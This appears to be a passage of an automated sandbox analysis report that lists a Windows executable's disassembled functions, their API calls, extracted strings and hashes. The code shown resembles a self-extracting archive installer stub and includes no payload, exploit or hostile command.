Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64

Function 0040677A Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040678E
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
GetDlgItem.USER32(?,000004B4), ref: 004067AB
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
GetDlgItem.USER32(?,?), ref: 004067CC
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
GetDlgItem.USER32(?,?), ref: 004067DD
SetFocus.USER32(00000000,?,000004B4,74DF0E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28

Function 0040C3D8 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 480COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603

Strings

IA, xrefs: 0040C4C6
IA, xrefs: 0040C66E
IA, xrefs: 0040C65E
IA, xrefs: 0040C74D
IA, xrefs: 0040C4AF
IA, xrefs: 0040C4D9

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@
String ID: IA$IA$IA$IA$IA$IA
API String ID: 613200358-3743982587
Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58

Function 004083B6 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 196COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479

Strings

BeginPrompt, xrefs: 004084A4, 004084A9
ErrorTitle, xrefs: 00408511
SetEnvironment, xrefs: 004083BC
FinishMessage, xrefs: 00408417, 00408433
WarningTitle, xrefs: 0040853A
HelpText, xrefs: 00408598

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@
String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
API String ID: 613200358-994561823
Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E

Function 00406DB2 Relevance: 12.1, APIs: 8, Instructions: 69COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
GetDC.USER32(00000000), ref: 00406DFB
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
ReleaseDC.USER32(00000000,?), ref: 00406E24
GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
String ID:
API String ID: 2693764856-0
Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65

Function 0040695E Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 0040696E
GetSystemMetrics.USER32(0000000B), ref: 0040698A
GetSystemMetrics.USER32(0000003D), ref: 00406993
GetSystemMetrics.USER32(0000003E), ref: 0040699B
SelectObject.GDI32(?,?), ref: 004069B8
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
SelectObject.GDI32(?,?), ref: 004069F9
ReleaseDC.USER32(?,?), ref: 00406A08

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40

Function 00407B33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
GetDlgItem.USER32(?,000004B8), ref: 00407B8B
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
wsprintfW.USER32 ref: 00407BBB
??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53

Strings

%d%%, xrefs: 00407BB5

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID: %d%%
API String ID: 3753976982-1518462796
Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59

Function 0040408B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4

Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175

Strings

hAA, xrefs: 00404091, 0040409B, 004040A2, 004040B0

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@$CharUpper$lstrlen
String ID: hAA
API String ID: 2587799592-1362906312
Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658

Function 00404CBC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8

Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D

Strings

;!@Install@!UTF-8!, xrefs: 00404D59
;!@InstallEnd@!, xrefs: 00404D73
03A, xrefs: 00404CCF

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@$FileTime$AttributesSystemlstrlen
String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 4038993085-2279431206
Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98

Function 0040755F Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 00407579
KillTimer.USER32(?,00000001), ref: 0040758A
SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
SuspendThread.KERNEL32(00000290), ref: 004075CD
ResumeThread.KERNEL32(00000290), ref: 004075EA
EndDialog.USER32(?,00000000), ref: 0040760C

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: DialogThreadTimer$KillResumeSuspend
String ID:
API String ID: 4151135813-0
Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D

Function 00404E3F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85

Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6

??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
wsprintfA.USER32 ref: 00404EBC

Strings

:Language:%u!, xrefs: 00404EB6
;!@Install@!UTF-8!, xrefs: 00404E4A
;!@InstallEnd@!, xrefs: 00404E59

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@$wsprintf
String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 2704270482-1550708412
Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799

Function 00403880 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932

Strings

%%T/, xrefs: 004038E4
%%T\, xrefs: 004038A6

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@
String ID: %%T/$%%T\
API String ID: 613200358-2679640699
Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98

Function 0040393B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED

Strings

%%S\, xrefs: 00403961
%%S/, xrefs: 0040399F

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@
String ID: %%S/$%%S\
API String ID: 613200358-358529586
Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98

Function 004039F6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8

Strings

%%M\, xrefs: 00403A1C
%%M/, xrefs: 00403A5A

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@
String ID: %%M/$%%M\
API String ID: 613200358-4143866494
Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58

Function 0040E456 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE

Strings

TJA, xrefs: 0040E4A1
4JA, xrefs: 0040E4AF
$JA, xrefs: 0040E4B6
DJA, xrefs: 0040E4A8
xJA, xrefs: 0040E493
hJA, xrefs: 0040E49A

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ExceptionThrow
String ID: $JA$4JA$DJA$TJA$hJA$xJA
API String ID: 432778473-803145960
Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C

Function 0040C0DC Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 243COMMON

Download Yara Rule

APIs

